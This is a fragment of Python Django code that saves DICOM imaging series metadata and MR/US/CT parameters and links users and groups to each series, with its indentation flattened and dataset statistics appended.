b3=Series(SeriesNumber=SeriesNumber,SeriesInstanceUID=SeriesInstanceUID,ProtocolName=ProtocolName,Modality=Modality,
SeriesDescription=SeriesDescription,SeriesTime=SeriesTime,ContrastAgent=ContrastAgent,ScanningSequence=ScanningSequence,
BodyPartExaminated=BodyPartExaminated,AcquisitionNumber=AcquisitionNumber,study=b2)
b3.save()
#group and user
for line in data:
UserID = data[line]['uid']
GroupId = data[line]['gid']
test_uid = UserID
test_gid = GroupId
print(test_uid)
print(test_gid)
searchUser = User.objects.all().filter(UserID=test_uid)
searchUGroup = User.objects.filter(group__GroupId__startswith=test_gid)
searchGroup = Group.objects.all().filter(GroupId=test_gid)
#searchSUser = Series.objects.filter(user__GroupId__startswith=)
if searchUser.exists():
b3.user.add(searchUser.first())
if searchUGroup.exists():
#print("user & group exist ")
print('user already in the data base')
else:
if searchGroup.exists():
#print("user & group exist but user not in that group")
searchUser.first().group.add(searchGroup.first())
else:
#print("user exist but not group")
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
# Bug fix: the original passed Project=Project — 'Project' is never defined
# (NameError at runtime) and the model field used by every parallel branch
# is GroupProject. Persist the GroupProject value extracted just above.
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
searchUser.first().group.add(gr)
else:
#print("new user & new group")
####################### Group table ######################
if searchGroup.exists():
#print("user not exist & group exist")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(searchGroup.first())
b3.user.add(user)
else:
####################### Group table ######################
try:
GroupName = data[line]['groupname']
except NameError:
GroupName = 'undefined'
except AttributeError:
GroupName = 'undefined'
try:
GroupId = data[line]['gid']
except NameError:
GroupId = 'undefined'
except AttributeError:
GroupId = 'undefined'
try:
GroupProject = data[line]['project']
except NameError:
GroupProject = 'undefined'
except AttributeError:
GroupProject = 'undefined'
gr=Group.objects.create(GroupName=GroupName,GroupId=GroupId,GroupProject=GroupProject)
gr.save()
#print("group")
####################### User table ######################
try:
UserName = data[line]['username']
except NameError:
UserName = 'undefined'
except AttributeError:
UserName = 'undefined'
try:
RealName = data[line]['username']
except NameError:
RealName = 'undefined'
except AttributeError:
RealName = 'undefined'
try:
UserID = data[line]['uid']
except NameError:
UserID = 'undefined'
except AttributeError:
UserID = 'undefined'
try:
Email = data[line]['email']
except NameError:
Email = 'undefined'
except AttributeError:
Email = 'undefined'
user=User.objects.create(UserName=UserName,RealName=RealName,
UserID=UserID,Email=Email)
user.save()
user.group.add(gr)
b3.user.add(user)
#print("end")
############ MR_Params table ##############
try:
PixelSpacing=ds.PixelSpacing
except NameError:
PixelSpacing = 'undefined'
except AttributeError:
PixelSpacing = 'undefined'
try:
SliceThickness=ds.SliceThickness
except NameError:
SliceThickness = 'undefined'
except AttributeError:
SliceThickness = 'undefined'
try:
EchoTime=ds.EchoTime
except NameError:
EchoTime = 'undefined'
except AttributeError:
EchoTime = 'undefined'
try:
EchoNumbers=ds.EchoNumbers
except NameError:
EchoNumbers = 'undefined'
except AttributeError:
EchoNumbers = 'undefined'
try:
InversionTime=ds.InversionTime
except NameError:
InversionTime = 'undefined'
except AttributeError:
InversionTime = 'undefined'
try:
RepetitionTime=ds.RepetitionTime
except NameError:
RepetitionTime = 'undefined'
except AttributeError:
RepetitionTime = 'undefined'
b4=MR_Params(PixelSpacing=PixelSpacing,SliceThickness=SliceThickness,EchoTime=EchoTime,EchoNumbers=EchoNumbers,
InversionTime=InversionTime,RepetitionTime=RepetitionTime,
modality_params= b3)
b4.save()
############# US_Params ###############
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b5=US_Params(Name=Name,modality_params=b3)
b5.save()
################ CT_Params ####################
try:
Name=ds.Name
except NameError:
Name = 'undefined'
except AttributeError:
Name = 'undefined'
b6=CT_Params(Name=Name,modality_params=b3)
b6.save()
| 39.557181
| 146
| 0.406512
| 3,378
| 59,494
| 7.129366
| 0.066311
| 0.088444
| 0.168584
| 0.014616
| 0.888386
| 0.879251
| 0.876261
| 0.876261
| 0.876261
| 0.876261
| 0
| 0.002433
| 0.495764
| 59,494
| 1,503
| 147
| 39.5835
| 0.80036
| 0.047114
| 0
| 0.94785
| 0
| 0
| 0.060213
| 0.002311
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000915
| false
| 0.000915
| 0.002745
| 0
| 0.005489
| 0.016468
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.